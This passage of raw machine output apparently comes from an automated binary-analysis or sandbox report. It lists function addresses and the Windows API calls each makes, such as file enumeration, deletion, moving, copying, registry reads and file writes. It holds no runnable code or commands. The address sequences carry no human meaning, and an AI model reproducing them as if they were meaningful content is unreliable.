101408->101409 101410 c1dd09 Mailbox 101409->101410 101471 c1d490 61 API calls 2 library calls 101409->101471 101410->101388 101412 c1ce3a 101411->101412 101416 c1ce8f 101411->101416 101413 bc0f16 Mailbox 59 API calls 101412->101413 101415 c1ce5c 101413->101415 101414 bc0f16 Mailbox 59 API calls 101414->101415 101415->101414 101415->101416 101417 c1df01 101416->101417 101418 c1e12a Mailbox 101417->101418 101425 c1df24 _strcat _wcscpy __wsetenvp 101417->101425 101418->101376 101419 ba50d5 59 API calls 101419->101425 101420 ba502b 59 API calls 101420->101425 101421 ba5087 59 API calls 101421->101425 101422 ba4d37 84 API calls 101422->101425 101423 bc586c 58 API calls __crtLCMapStringA_stat 101423->101425 101425->101418 101425->101419 101425->101420 101425->101421 101425->101422 101425->101423 101480 c05caf 61 API calls 2 library calls 101425->101480 101427 bc0d7d 101426->101427 101428 bc0e15 Sleep 101427->101428 101429 bc0de3 101427->101429 101430 bc0e03 FindCloseChangeNotification 101427->101430 101428->101429 101429->101379 101429->101380 101430->101429 101431->101388 101432->101388 101433->101383 101435 ba47c6 101434->101435 101436 bc0f16 Mailbox 59 API calls 101435->101436 101437 ba47d4 101436->101437 101438 ba47e0 101437->101438 101481 ba46ec 59 API calls Mailbox 101437->101481 101440 ba4540 101438->101440 101482 ba4650 101440->101482 101442 ba454f 101443 bc0f16 Mailbox 59 API calls 101442->101443 101444 ba45eb 101442->101444 101443->101444 101444->101397 101445 ba4230 59 API calls Mailbox 101444->101445 101445->101391 101446->101397 101447->101397 101448->101397 101449->101368 101450->101397 101452 bff711 __wsetenvp 101451->101452 101453 bff750 101452->101453 101456 bff746 101452->101456 101457 bff7f7 101452->101457 101453->101404 101453->101409 101455 bb14db 61 API calls 101455->101457 101456->101453 101472 bb14db 101456->101472 101457->101453 101457->101455 101459 bb14ce 101458->101459 101460 bb1471 101458->101460 101461 bb1981 59 API calls 101459->101461 101460->101459 101462 bb147c 101460->101462 101468 bb149f _memmove 101461->101468 101463 bef15e 101462->101463 101464 bb1497 101462->101464 101465 bb1c7e 59 API calls 101463->101465 101479 bb1b7c 59 API calls Mailbox 101464->101479 101467 bef168 101465->101467 101469 bc0f16 Mailbox 59 API calls 101467->101469 101468->101407 101470 bef188 101469->101470 101471->101410 101473 bb14e9 CompareStringW 101472->101473 101474 bef190 101472->101474 101476 bb150c 101473->101476 101477 bef1df 101474->101477 101478 bc4de8 60 API calls 101474->101478 101476->101456 101478->101474 101479->101468 101480->101425 101481->101438 101483 ba4659 Mailbox 101482->101483 101484 bdd61c 101483->101484 101489 ba4663 101483->101489 101485 bc0f16 Mailbox 59 API calls 101484->101485 101487 bdd628 101485->101487 101486 ba466a 101486->101442 101489->101486 101490 ba5190 59 API calls Mailbox 101489->101490 101490->101489 101492 bb1207 59 API calls 101491->101492 101493 c03e91 101492->101493 101494 bb1207 59 API calls 101493->101494 101495 c03e9a 101494->101495 101496 bb1207 59 API calls 101495->101496 101497 c03ea3 101496->101497 101498 bc01af 60 API calls 101497->101498 101499 c03eae 101498->101499 101516 c04e59 GetFileAttributesW 101499->101516 101502 c03ec9 101518 bc0044 101502->101518 101503 bb1900 59 API calls 101503->101502 101505 c03edd FindFirstFileW 101506 c03f69 FindClose 101505->101506 101507 c03efc 101505->101507 101510 c03f74 Mailbox 101506->101510 101507->101506 101512 c03f00 101507->101512 101508 c03f44 FindNextFileW 101508->101507 101508->101512 101509 bb1c9c 59 API calls 101509->101512 101510->101051 101512->101507 101512->101508 101512->101509 101513 bb1900 59 API calls 101512->101513 101569 bb17e0 101512->101569 101514 c03f35 DeleteFileW 101513->101514 101514->101508 101515 c03f60 FindClose 101514->101515 101515->101510 101517 c03eb7 101516->101517 101517->101502 101517->101503 101519 bb1207 59 API calls 101518->101519 101520 bc005a 101519->101520 101521 bb1207 59 API calls 101520->101521 101522 bc0062 101521->101522 101523 bb1207 59 API calls 101522->101523 101524 bc006a 101523->101524 101525 bb1207 59 API calls 101524->101525 101526 bc0072 101525->101526 101527 bc00a6 101526->101527 101528 bf6062 101526->101528 101529 bb1462 59 API calls 101527->101529 101530 bb1c9c 59 API calls 101528->101530 101531 bc00b4 101529->101531 101532 bf606b 101530->101532 101533 bb1981 59 API calls 101531->101533 101534 bb19e1 59 API calls 101532->101534 101535 bc00be 101533->101535 101537 bc00e9 101534->101537 101536 bb1462 59 API calls 101535->101536 101535->101537 101539 bc00df 101536->101539 101540 bc0108 101537->101540 101541 bf608b 101537->101541 101555 bc0129 101537->101555 101538 bb1462 59 API calls 101543 bc013a 101538->101543 101544 bb1981 59 API calls 101539->101544 101578 bb1609 101540->101578 101545 bf615b 101541->101545 101550 bf6144 101541->101550 101563 bf60c2 101541->101563 101547 bc014c 101543->101547 101549 bb1c9c 59 API calls 101543->101549 101544->101537 101548 bb1821 59 API calls 101545->101548 101551 bc015c 101547->101551 101554 bb1c9c 59 API calls 101547->101554 101564 bf6118 101548->101564 101549->101547 101550->101545 101560 bf612f 101550->101560 101552 bc0163 101551->101552 101556 bb1c9c 59 API calls 101551->101556 101557 bb1c9c 59 API calls 101552->101557 101566 bc016a Mailbox 101552->101566 101553 bb1462 59 API calls 101553->101555 101554->101551 101555->101538 101556->101552 101557->101566 101558 bb1609 59 API calls 101558->101564 101559 bf6120 101561 bb1821 59 API calls 101559->101561 101562 bb1821 59 API calls 101560->101562 101561->101564 101562->101564 101563->101559 101567 bf610b 101563->101567 101564->101555 101564->101558 101581 bb153b 59 API calls 2 library calls 101564->101581 101566->101505 101568 bb1821 59 API calls 101567->101568 101568->101564 101570 bb17f2 101569->101570 101571 bef381 101569->101571 101582 bb1680 101570->101582 101588 bf85dc 59 API calls _memmove 101571->101588 101574 bb17fe 101574->101512 101575 bef38b 101576 bb1c9c 59 API calls 101575->101576 101577 bef393 Mailbox 101576->101577 101579 bb1aa4 59 API calls 101578->101579 101580 bb1614 101579->101580 101580->101553 101580->101555 101581->101564 101583 bb1692 101582->101583 101586 bb16ba _memmove 101582->101586 101584 bc0f16 Mailbox 59 API calls 101583->101584 101583->101586 101585 bb176f _memmove 101584->101585 101587 bc0f16 Mailbox 59 API calls 101585->101587 101586->101574 101587->101585 101588->101575 101590 c0f705 101589->101590 101591 c0f75f 101589->101591 101592 bc0f16 Mailbox 59 API calls 101590->101592 101665 c0fa24 59 API calls 101591->101665 101594 c0f70c 101592->101594 101595 c0f718 101594->101595 101652 bb3df7 60 API calls Mailbox 101594->101652 101597 ba4d37 84 API calls 101595->101597 101602 c0f72a 101597->101602 101598 c0f838 101645 c08b3d 101598->101645 101599 c0f76c 101599->101598 101600 c0f746 101599->101600 101606 c0f7ac 101599->101606 101600->101056 101653 bb3e47 101602->101653 101604 c0f83f 101649 c037ba 101604->101649 101608 ba4d37 84 API calls 101606->101608 101607 c0f73a 101607->101600 101664 bb3f0b FindCloseChangeNotification 101607->101664 101614 c0f7b3 101608->101614 101611 c0f82e 101626 c03809 101611->101626 101612 c0f7e7 101666 bb162d 101612->101666 101614->101611 101614->101612 101616 bb42cf FindCloseChangeNotification 101619 c0f88d 101616->101619 101618 bb1c9c 59 API calls 101620 c0f801 101618->101620 101619->101600 101671 bb3f0b FindCloseChangeNotification 101619->101671 101621 bb1900 59 API calls 101620->101621 101623 c0f80f 101621->101623 101624 c03809 66 API calls 101623->101624 101625 c0f81b Mailbox 101624->101625 101625->101600 101625->101616 101627 c03882 101626->101627 101628 c0381c 101626->101628 101630 c037ba 3 API calls 101627->101630 101628->101627 101629 c03821 101628->101629 101631 c03876 101629->101631 101632 c0382b 101629->101632 101644 c0386a Mailbox 101630->101644 101689 c038a2 62 API calls Mailbox 101631->101689 101634 c0384b 101632->101634 101635 c03835 101632->101635 101636 bb40cd 59 API calls 101634->101636 101675 bb40cd 101635->101675 101638 c03853 101636->101638 101688 c0374d 61 API calls Mailbox 101638->101688 101641 c03849 101672 c037eb 101641->101672 101644->101625 101646 c08b46 101645->101646 101647 c08b4b 101645->101647 101692 c07bdb 61 API calls 2 library calls 101646->101692 101647->101604 101693 c036b9 101649->101693 101651 c037c6 WriteFile 101651->101625 101652->101595 101654 bb42cf FindCloseChangeNotification 101653->101654 101655 bb3e53 101654->101655 101702 bb42f9 101655->101702 101657 bb3e72 101658 bb3e95 101657->101658 101710 bb3c61 62 API calls Mailbox 101657->101710 101658->101599 101658->101607 101660 bb3e84 101711 bb389f 101660->101711 101663 c037ba 3 API calls 101663->101658 101664->101600 101665->101599 101667 bc0f16 Mailbox 59 API calls 101666->101667 101668 bb1652 101667->101668 101669 bc0f16 Mailbox 59 API calls 101668->101669 101670 bb1660 101669->101670 101670->101618 101671->101600 101673 c037ba 3 API calls 101672->101673 101674 c037fd 101673->101674 101674->101644 101676 bc0f16 Mailbox 59 API calls 101675->101676 101677 bb40e0 101676->101677 101678 bb1c7e 59 API calls 101677->101678 101679 bb40ed 101678->101679 101680 bb402a WideCharToMultiByte 101679->101680 101681 bb404e 101680->101681 101682 bb4085 101680->101682 101683 bc0f16 Mailbox 59 API calls 101681->101683 101691 bb3f20 59 API calls Mailbox 101682->101691 101685 bb4055 WideCharToMultiByte 101683->101685 101690 bb3f79 59 API calls 2 library calls 101685->101690 101687 bb4077 101687->101641 101688->101641 101689->101644 101690->101687 101691->101687 101692->101647 101694 c036c0 101693->101694 101695 c036cb 101693->101695 101700 bb42ae SetFilePointerEx 101694->101700 101695->101651 101697 c03725 SetFilePointerEx 101701 bb42ae SetFilePointerEx 101697->101701 101699 c03744 101699->101651 101700->101697 101701->101699 101703 bf067c 101702->101703 101704 bb4312 CreateFileW 101702->101704 101705 bb4334 101703->101705 101706 bf0682 CreateFileW 101703->101706 101704->101705 101705->101657 101706->101705 101707 bf06a8 101706->101707 101715 bb410a 101707->101715 101710->101660 101712 bb38a8 101711->101712 101713 bb38b5 101711->101713 101714 bb410a 2 API calls 101712->101714 101713->101658 101713->101663 101714->101713 101722 bb4124 101715->101722 101716 bf064c 101724 bb42ae SetFilePointerEx 101716->101724 101717 bb41ab SetFilePointerEx 101723 bb42ae SetFilePointerEx 101717->101723 101720 bb417f 101720->101705 101721 bf0666 101722->101716 101722->101717 101722->101720 101723->101720 101724->101721 101726 bb133d 59 API calls 101725->101726 101727 c03dbf GetFileAttributesW 101726->101727 101728 c03dd3 GetLastError 101727->101728 101731 c03dec Mailbox 101727->101731 101729 c03de0 CreateDirectoryW 101728->101729 101730 c03dee 101728->101730 101729->101730 101729->101731 101730->101731 101732 bb1981 59 API calls 101730->101732 101731->101090 101733 c03e30 101732->101733 101734 c03d8a 59 API calls 101733->101734 101735 c03e39 101734->101735 101735->101731 101736 c03e3d CreateDirectoryW 101735->101736 101736->101731 101738 bb1207 59 API calls 101737->101738 101739 c03b6c 101738->101739 101740 bb1207 59 API calls 101739->101740 101741 c03b74 101740->101741 101742 bb1207 59 API calls 101741->101742 101743 c03b7c 101742->101743 101744 bb1207 59 API calls 101743->101744 101745 c03b84 101744->101745 101746 bc01af 60 API calls 101745->101746 101747 c03b8e 101746->101747 101748 bc01af 60 API calls 101747->101748 101749 c03b98 101748->101749 101783 c04def 101749->101783 101751 c03ba3 101752 c04e59 GetFileAttributesW 101751->101752 101753 c03bae 101752->101753 101754 c03bc0 101753->101754 101755 bb1900 59 API calls 101753->101755 101756 c04e59 GetFileAttributesW 101754->101756 101755->101754 101757 c03bc8 101756->101757 101758 c03bd5 101757->101758 101759 bb1900 59 API calls 101757->101759 101760 bb1207 59 API calls 101758->101760 101759->101758 101761 c03bdd 101760->101761 101762 bb1207 59 API calls 101761->101762 101763 c03be5 101762->101763 101764 bc0044 59 API calls 101763->101764 101765 c03bf6 FindFirstFileW 101764->101765 101766 c03d21 FindClose 101765->101766 101781 c03c19 Mailbox 101765->101781 101772 c03d2b Mailbox 101766->101772 101767 c03cf5 FindNextFileW 101767->101781 101768 bb1a36 59 API calls 101768->101781 101770 bb1c9c 59 API calls 101770->101781 101771 bb17e0 59 API calls 101771->101781 101772->101089 101773 bb1900 59 API calls 101773->101781 101774 c03f97 3 API calls 101774->101781 101775 c03c97 101779 c03cbb MoveFileW 101775->101779 101780 c03cab DeleteFileW 101775->101780 101848 bb151f 101775->101848 101776 c03d18 FindClose 101776->101772 101778 c03d64 CopyFileExW 101778->101781 101779->101781 101780->101781 101781->101766 101781->101767 101781->101768 101781->101770 101781->101771 101781->101773 101781->101774 101781->101775 101781->101776 101781->101778 101782 c03cd8 DeleteFileW 101781->101782 101794 c043ce 101781->101794 101782->101781 101784 bb1207 59 API calls 101783->101784 101785 c04e04 101784->101785 101786 bb1207 59 API calls 101785->101786 101787 c04e0c 101786->101787 101788 bc0044 59 API calls 101787->101788 101789 c04e1b 101788->101789 101790 bc0044 59 API calls 101789->101790 101791 c04e2b 101790->101791 101792 bb151f 61 API calls 101791->101792 101793 c04e3b Mailbox 101792->101793 101793->101751 101795 c043ea 101794->101795 101796 c043fd 101795->101796 101797 c043ef 101795->101797 101799 bb1207 59 API calls 101796->101799 101798 bb1c9c 59 API calls 101797->101798 101847 c043f8 Mailbox 101798->101847 101800 c04405 101799->101800 101801 bb1207 59 API calls 101800->101801 101802 c0440d 101801->101802 101803 bb1207 59 API calls 101802->101803 101804 c04418 101803->101804 101805 bb1207 59 API calls 101804->101805 101806 c04420 101805->101806 101807 bb1207 59 API calls 101806->101807 101808 c04428 101807->101808 101809 bb1207 59 API calls 101808->101809 101810 c04430 101809->101810 101811 bb1207 59 API calls 101810->101811 101812 c04438 101811->101812 101813 bb1207 59 API calls 101812->101813 101814 c04440 101813->101814 101815 bc0044 59 API calls 101814->101815 101816 c04457 101815->101816 101817 bc0044 59 API calls 101816->101817 101818 c04470 101817->101818 101819 bb1609 59 API calls 101818->101819 101820 c0447c 101819->101820 101821 c0448f 101820->101821 101822 bb1981 59 API calls 101820->101822 101823 bb1609 59 API calls 101821->101823 101822->101821 101824 c04498 101823->101824 101825 c044a8 101824->101825 101826 bb1981 59 API calls 101824->101826 101827 bb1c9c 59 API calls 101825->101827 101826->101825 101828 c044b4 101827->101828 101829 bb17e0 59 API calls 101828->101829 101830 c044c0 101829->101830 101851 c04580 59 API calls 101830->101851 101832 c044cf 101852 c04580 59 API calls 101832->101852 101834 c044e2 101835 bb1609 59 API calls 101834->101835 101836 c044ec 101835->101836 101837 c044f1 101836->101837 101838 c04503 101836->101838 101839 bb1900 59 API calls 101837->101839 101840 bb1609 59 API calls 101838->101840 101841 c044fe 101839->101841 101842 c0450c 101840->101842 101845 bb17e0 59 API calls 101841->101845 101843 c0452a 101842->101843 101844 bb1900 59 API calls 101842->101844 101846 bb17e0 59 API calls 101843->101846 101844->101841 101845->101843 101846->101847 101847->101781 101849 bb14db 61 API calls 101848->101849 101850 bb1537 101849->101850 101850->101775 101851->101832 101852->101834 101853->101098 101854->101108 101855->101106 101857 c1a6e0 101856->101857 101861 c1a738 101856->101861 101858 bc0f16 Mailbox 59 API calls 101857->101858 101862 c1a702 101858->101862 101859 bc0f16 Mailbox 59 API calls 101859->101862 101861->101135 101862->101859 101862->101861 101888 bf6f3e 59 API calls Mailbox 101862->101888 101864 c07719 101863->101864 101865 c07750 101863->101865 101864->101865 101866 bc0f16 Mailbox 59 API calls 101864->101866 101867 bf6c9f 101865->101867 101866->101865 101868 bf6ce9 101867->101868 101872 bf6cff Mailbox 101867->101872 101869 bb1a36 59 API calls 101868->101869 101869->101872 101870 bf6d3d 101874 baa820 434 API calls 101870->101874 101871 bf6d2a 101873 c1c11d 434 API calls 101871->101873 101872->101870 101872->101871 101882 bf6d36 101873->101882 101878 bf6d74 101874->101878 101876 bf6de5 101876->101137 101877 bf6dbf 101877->101882 101895 c0a2fa 89 API calls 4 library calls 101877->101895 101878->101877 101880 bf6da4 101878->101880 101878->101882 101889 bf6e50 101880->101889 101896 bf6ad4 59 API calls Mailbox 101882->101896 101883->101137 101884->101146 101885->101152 101886->101163 101887->101167 101888->101862 101890 bf6e68 101889->101890 101897 c1ef7a 101890->101897 101902 c1473f 101890->101902 101911 c03fa7 101890->101911 101891 bf6ebc 101891->101882 101895->101882 101896->101876 101898 ba4d37 84 API calls 101897->101898 101899 c1ef97 101898->101899 101900 c03fb5 66 API calls 101899->101900 101901 c1efa6 101900->101901 101901->101891 101903 bc0f16 Mailbox 59 API calls 101902->101903 101904 c14750 101903->101904 101905 bb433f 59 API calls 101904->101905 101906 c1475a 101905->101906 101907 ba4d37 84 API calls 101906->101907 101908 c14771 GetEnvironmentVariableW 101907->101908 101914 c078be 59 API calls Mailbox 101908->101914 101910 c1478e 101910->101891 101912 c047b7 3 API calls 101911->101912 101913 c03fac 101912->101913 101913->101891 101914->101910 101916 c04b76 101915->101916 101917 c04b5d 101915->101917 101922 bc36f5 59 API calls __wcstoi64 101916->101922 101917->101916 101920 c04b7c 101917->101920 101921 bc378e GetStringTypeW _iswctype 101917->101921 101920->101180 101921->101917 101922->101920 101923->100960 101924->100960 101925->100952 101926->100963 101927->100948 101928->100963 101929->100963 101930->100968 101931 ba1055 101936 ba2a19 101931->101936 101934 bc2ea0 __cinit 67 API calls 101935 ba1064 101934->101935 101937 bb1207 59 API calls 101936->101937 101938 ba2a87 101937->101938 101943 ba1256 101938->101943 101941 ba2b24 101942 ba105a 101941->101942 101946 ba13c7 59 API calls 2 library calls 101941->101946 101942->101934 101947 ba1284 101943->101947 101946->101941 101948 ba1275 101947->101948 101949 ba1291 101947->101949 101948->101941 101949->101948 101950 ba1298 RegOpenKeyExW 101949->101950 101950->101948 101951 ba12b2 RegQueryValueExW 101950->101951 101952 ba12e8 RegCloseKey 101951->101952 101953 ba12d3 101951->101953 101952->101948 101953->101952 101954 bc7db3 101955 bc7dbf _fseek 101954->101955 101991 bc9f68 GetStartupInfoW 101955->101991 101957 bc7dc4 101993 bc8cdc GetProcessHeap 101957->101993 101959 bc7e1c 101960 bc7e27 101959->101960 102076 bc7f03 58 API calls 3 library calls 101959->102076 101994 bc9c46 101960->101994 101963 bc7e2d 101964 bc7e38 __RTC_Initialize 101963->101964 102077 bc7f03 58 API calls 3 library calls 101963->102077 102015 bcd732 101964->102015 101967 bc7e47 101968 bc7e53 GetCommandLineW 101967->101968 102078 bc7f03 58 API calls 3 library calls 101967->102078 102034 bd5083 GetEnvironmentStringsW 101968->102034 101971 bc7e52 101971->101968 101974 bc7e6d 101975 bc7e78 101974->101975 102079 bc3217 58 API calls 3 library calls 101974->102079 102044 bd4eb8 101975->102044 101978 bc7e7e 101979 bc7e89 101978->101979 102080 bc3217 58 API calls 3 library calls 101978->102080 102058 bc3251 101979->102058 101982 bc7e91 101983 bc7e9c __wwincmdln 101982->101983 102081 bc3217 58 API calls 3 library calls 101982->102081 102064 bb5f8b 101983->102064 101986 bc7eb0 101987 bc7ebf 101986->101987 102082 bc34ba 58 API calls _doexit 101986->102082 102083 bc3242 58 API calls _doexit 101987->102083 101990 bc7ec4 _fseek 101992 bc9f7e 101991->101992 101992->101957 101993->101959 102084 bc32e9 36 API calls 2 library calls 101994->102084 101996 bc9c4b 102085 bc9e9c InitializeCriticalSectionAndSpinCount __getstream 101996->102085 101998 bc9c50 101999 bc9c54 101998->101999 102087 bc9eea TlsAlloc 101998->102087 102086 bc9cbc 61 API calls 2 library calls 101999->102086 102002 bc9c59 102002->101963 102003 bc9c66 102003->101999 102004 bc9c71 102003->102004 102088 bc8935 102004->102088 102007 bc9cb3 102096 bc9cbc 61 API calls 2 library calls 102007->102096 102010 bc9cb8 102010->101963 102011 bc9c92 102011->102007 102012 bc9c98 102011->102012 102095 bc9b93 58 API calls 4 library calls 102012->102095 102014 bc9ca0 GetCurrentThreadId 102014->101963 102016 bcd73e _fseek 102015->102016 102017 bc9d6b __lock 58 API calls 102016->102017 102018 bcd745 102017->102018 102019 bc8935 __calloc_crt 58 API calls 102018->102019 102020 bcd756 102019->102020 102021 bcd7c1 GetStartupInfoW 102020->102021 102022 bcd761 _fseek @_EH4_CallFilterFunc@8 102020->102022 102024 bcd905 102021->102024 102030 bcd7d6 102021->102030 102022->101967 102023 bcd9cd 102110 bcd9dd LeaveCriticalSection _doexit 102023->102110 102024->102023 102028 bcd952 GetStdHandle 102024->102028 102029 bcd965 GetFileType 102024->102029 102109 bc9f8b InitializeCriticalSectionAndSpinCount 102024->102109 102026 bcd824 102026->102024 102031 bcd858 GetFileType 102026->102031 102108 bc9f8b InitializeCriticalSectionAndSpinCount 102026->102108 102027 bc8935 __calloc_crt 58 API calls 102027->102030 102028->102024 102029->102024 102030->102024 102030->102026 102030->102027 102031->102026 102035 bc7e63 102034->102035 102036 bd5094 102034->102036 102040 bd4c7b GetModuleFileNameW 102035->102040 102111 bc897d 58 API calls 2 library calls 102036->102111 102038 bd50ba _memmove 102039 bd50d0 FreeEnvironmentStringsW 102038->102039 102039->102035 102041 bd4caf _wparse_cmdline 102040->102041 102043 bd4cef _wparse_cmdline 102041->102043 102112 bc897d 58 API calls 2 library calls 102041->102112 102043->101974 102045 bd4ec9 102044->102045 102046 bd4ed1 __wsetenvp 102044->102046 102045->101978 102047 bc8935 __calloc_crt 58 API calls 102046->102047 102054 bd4efa __wsetenvp 102047->102054 102048 bd4f51 102049 bc2eb5 _free 58 API calls 102048->102049 102049->102045 102050 bc8935 __calloc_crt 58 API calls 102050->102054 102051 bd4f76 102052 bc2eb5 _free 58 API calls 102051->102052 102052->102045 102054->102045 102054->102048 102054->102050 102054->102051 102055 bd4f8d 102054->102055 102113 bd4767 58 API calls _fseek 102054->102113 102114 bc8f26 IsProcessorFeaturePresent 102055->102114 102057 bd4f99 102057->101978 102060 bc325d __IsNonwritableInCurrentImage 102058->102060 102137 bca631 102060->102137 102061 bc327b __initterm_e 102062 bc2ea0 __cinit 67 API calls 102061->102062 102063 bc329a _doexit __IsNonwritableInCurrentImage 102061->102063 102062->102063 102063->101982 102065 bb5fa5 102064->102065 102075 bb6044 102064->102075 102066 bb5fdf IsThemeActive 102065->102066 102140 bc34ce 102066->102140 102070 bb600b 102152 bb5f00 SystemParametersInfoW SystemParametersInfoW 102070->102152 102072 bb6017 102153 bb5240 102072->102153 102074 bb601f SystemParametersInfoW 102074->102075 102075->101986 102076->101960 102077->101964 102078->101971 102082->101987 102083->101990 102084->101996 102085->101998 102086->102002 102087->102003 102091 bc893c 102088->102091 102090 bc8977 102090->102007 102094 bc9f46 TlsSetValue 102090->102094 102091->102090 102093 bc895a 102091->102093 102097 bd5356 102091->102097 102093->102090 102093->102091 102105 bca292 Sleep 102093->102105 102094->102011 102095->102014 102096->102010 102098 bd5361 102097->102098 102103 bd537c 102097->102103 102099 bd536d 102098->102099 102098->102103 102106 bc8c88 58 API calls __getptd_noexit 102099->102106 102101 bd538c HeapAlloc 102102 bd5372 102101->102102 102101->102103 102102->102091 102103->102101 102103->102102 102107 bc3503 DecodePointer 102103->102107 102105->102093 102106->102102 102107->102103 102108->102026 102109->102024 102110->102022 102111->102038 102112->102043 102113->102054 102115 bc8f31 102114->102115 102120 bc8db9 102115->102120 102119 bc8f4c 102119->102057 102121 bc8dd3 _memset __call_reportfault 102120->102121 102122 bc8df3 IsDebuggerPresent 102121->102122 102128 bca2b5 SetUnhandledExceptionFilter UnhandledExceptionFilter 102122->102128 102125 bc8eb7 __call_reportfault 102129 bcc756 102125->102129 102126 bc8eda 102127 bca2a0 GetCurrentProcess TerminateProcess 102126->102127 102127->102119 102128->102125 102130 bcc75e 102129->102130 102131 bcc760 IsProcessorFeaturePresent 102129->102131 102130->102126 102133 bd5a6a 102131->102133 102136 bd5a19 5 API calls 2 library calls 102133->102136 102135 bd5b4d 102135->102126 102136->102135 102138 bca634 EncodePointer 102137->102138 102138->102138 102139 bca64e 102138->102139 102139->102061 102141 bc9d6b __lock 58 API calls 102140->102141 102142 bc34d9 DecodePointer EncodePointer 102141->102142 102205 bc9ed5 LeaveCriticalSection 102142->102205 102144 bb6004 102145 bc3536 102144->102145 102146 bc355a 102145->102146 102147 bc3540 102145->102147 102146->102070 102147->102146 102206 bc8c88 58 API calls __getptd_noexit 102147->102206 102149 bc354a 102207 bc8f16 9 API calls _fseek 102149->102207 102151 bc3555 102151->102070 102152->102072 102154 bb524d __write_nolock 102153->102154 102155 bb1207 59 API calls 102154->102155 102156 bb5258 GetCurrentDirectoryW 102155->102156 102208 bb4ec8 102156->102208 102158 bb527e IsDebuggerPresent 102159 bb528c 102158->102159 102160 bf0aa1 MessageBoxA 102158->102160 102161 bf0ab9 102159->102161 102162 bb52a0 102159->102162 102160->102161 102331 bb314d 59 API calls Mailbox 102161->102331 102276 bb31bf 102162->102276 102165 bf0ac9 102173 bf0adf SetCurrentDirectoryW 102165->102173 102172 bb536c Mailbox 102172->102074 102173->102172 102205->102144 102206->102149 102207->102151 102209 bb1207 59 API calls 102208->102209 102210 bb4ede 102209->102210 102333 bb5420 102210->102333 102212 bb4efc 102213 bb19e1 59 API calls 102212->102213 102214 bb4f10 102213->102214 102215 bb1c9c 59 API calls 102214->102215 102216 bb4f1b 102215->102216 102347 ba477a 102216->102347 102219 bb1a36 59 API calls 102220 bb4f34 102219->102220 102221 ba39be 68 API calls 102220->102221 102222 bb4f44 Mailbox 102221->102222 102223 bb1a36 59 API calls 102222->102223 102224 bb4f68 102223->102224 102225 ba39be 68 API calls 102224->102225 102226 bb4f77 Mailbox 102225->102226 102227 bb1207 59 API calls 102226->102227 102228 bb4f94 102227->102228 102350 bb55bc 102228->102350 102232 bb4fae 102233 bb4fb8 102232->102233 102234 bf09d4 102232->102234 102236 bc305f _W_store_winword 60 API calls 102233->102236 102235 bb55bc 59 API calls 102234->102235 102237 bf09e8 102235->102237 102238 bb4fc3 102236->102238 102240 bb55bc 59 API calls 102237->102240 102238->102237 102239 bb4fcd 102238->102239 102241 bc305f _W_store_winword 60 API calls 102239->102241 102242 bf0a04 102240->102242 102243 bb4fd8 102241->102243 102245 bbfffa 61 API calls 102242->102245 102243->102242 102244 bb4fe2 102243->102244 102246 bc305f _W_store_winword 60 API calls 102244->102246 102247 bf0a27 102245->102247 102248 bb4fed 102246->102248 102249 bb55bc 59 API calls 102247->102249 102250 bf0a50 102248->102250 102251 bb4ff7 102248->102251 102253 bf0a33 102249->102253 102252 bb55bc 59 API calls 102250->102252 102254 bb501b 102251->102254 102257 bb1c9c 59 API calls 102251->102257 102255 bf0a6e 102252->102255 102256 bb1c9c 59 API calls 102253->102256 102259 ba47be 59 API calls 102254->102259 102260 bb1c9c 59 API calls 102255->102260 102261 bf0a41 102256->102261 102258 bb500e 102257->102258 102263 bb55bc 59 API calls 102258->102263 102264 bb502a 102259->102264 102265 bf0a7c 102260->102265 102262 bb55bc 59 API calls 102261->102262 102262->102250 102263->102254 102266 ba4540 59 API calls 102264->102266 102267 bb55bc 59 API calls 102265->102267 102268 bb5038 102266->102268 102269 bf0a8b 102267->102269 102366 ba43d0 102268->102366 102269->102269 102271 ba477a 59 API calls 102273 bb5055 102271->102273 102272 ba43d0 59 API calls 102272->102273 102273->102271 102273->102272 102274 bb55bc 59 API calls 102273->102274 102275 bb509b Mailbox 102273->102275 102274->102273 102275->102158 102277 bb31cc __write_nolock 102276->102277 102278 bf0294 _memset 102277->102278 102279 bb31e5 102277->102279 102281 bf02b0 GetOpenFileNameW 102278->102281 102280 bc01af 60 API calls 102279->102280 102282 bb31ee 102280->102282 102283 bf02ff 102281->102283 102380 bc08f0 102282->102380 102286 bb1821 59 API calls 102283->102286 102288 bf0314 102286->102288 102288->102288 102289 bb3203 102398 bb278a 102289->102398 102331->102165 102334 bb542d __write_nolock 102333->102334 102335 bb1821 59 API calls 102334->102335 102340 bb5590 Mailbox 102334->102340 102337 bb545f 102335->102337 102336 bb1609 59 API calls 102336->102337 102337->102336 102345 bb5495 Mailbox 102337->102345 102338 bb5563 102339 bb1a36 59 API calls 102338->102339 102338->102340 102341 bb5584 102339->102341 102340->102212 102343 bb4c94 59 API calls 102341->102343 102342 bb1a36 59 API calls 102342->102345 102343->102340 102344 bb4c94 59 API calls 102344->102345 102345->102338 102345->102340 102345->102342 102345->102344 102346 bb1609 59 API calls 102345->102346 102346->102345 102348 bc0f16 Mailbox 59 API calls 102347->102348 102349 ba4787 102348->102349 102349->102219 102351 bb55df 102350->102351 102352 bb55c6 102350->102352 102353 bb1821 59 API calls 102351->102353 102354 bb1c9c 59 API calls 102352->102354 102355 bb4fa0 102353->102355 102354->102355 102356 bc305f 102355->102356 102357 bc306b 102356->102357 102358 bc30e0 102356->102358 102365 bc3090 102357->102365 102375 bc8c88 58 API calls __getptd_noexit 102357->102375 102377 bc30f2 60 API calls 3 library calls 102358->102377 102361 bc30ed 102361->102232 102362 bc3077 102376 bc8f16 9 API calls _fseek 102362->102376 102364 bc3082 102364->102232 102365->102232 102367 bdd5f9 102366->102367 102372 ba43e7 102366->102372 102367->102372 102379 ba40cb 59 API calls Mailbox 102367->102379 102369 ba44e8 102373 bc0f16 Mailbox 59 API calls 102369->102373 102370 ba4530 102378 ba523c 59 API calls 102370->102378 102372->102369 102372->102370 102374 ba44ef 102372->102374 102373->102374 102374->102273 102375->102362 102376->102364 102377->102361 102378->102374 102379->102372 102381 bd1aa0 __write_nolock 102380->102381 102382 bc08fd GetLongPathNameW 102381->102382 102383 bb1821 59 API calls 102382->102383 102384 bb31f7 102383->102384 102385 bb2f3d 102384->102385 102386 bb1207 59 API calls 102385->102386 102387 bb2f4f 102386->102387 102388 bc01af 60 API calls 102387->102388 102389 bb2f5a 102388->102389 102390 bb2f65 102389->102390 102394 bf00f7 102389->102394 102391 bb4c94 59 API calls 102390->102391 102393 bb2f71 102391->102393 102392 bb151f 61 API calls 102392->102394 102432 ba1307 102393->102432 102394->102392 102395 bf0111 102394->102395 102397 bb2f84 Mailbox 102397->102289 102438 bb49c2 102398->102438 102433 ba1319 